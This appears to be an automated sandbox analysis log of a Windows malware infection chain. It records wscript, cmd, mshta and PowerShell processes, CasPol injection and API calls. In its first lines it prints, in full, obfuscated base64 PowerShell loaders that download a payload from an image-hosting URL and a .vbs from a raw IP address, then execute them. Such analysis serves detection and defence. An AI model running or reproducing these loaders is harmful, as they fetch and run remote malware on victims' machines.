Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

11_2_0041BCF3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02E40CE5 pushfd ; iretd	8_2_02E40CEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00434006 push ecx; ret	11_2_00434019
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_004567F0 push eax; ret	11_2_0045680E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_0045B9DD push esi; ret	11_2_0045B9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00455EBF push ecx; ret	11_2_00455ED2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00406128 ShellExecuteW,URLDownloadToFileW,

11_2_00406128

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_00419BD4

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

11_2_0041BCF3

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
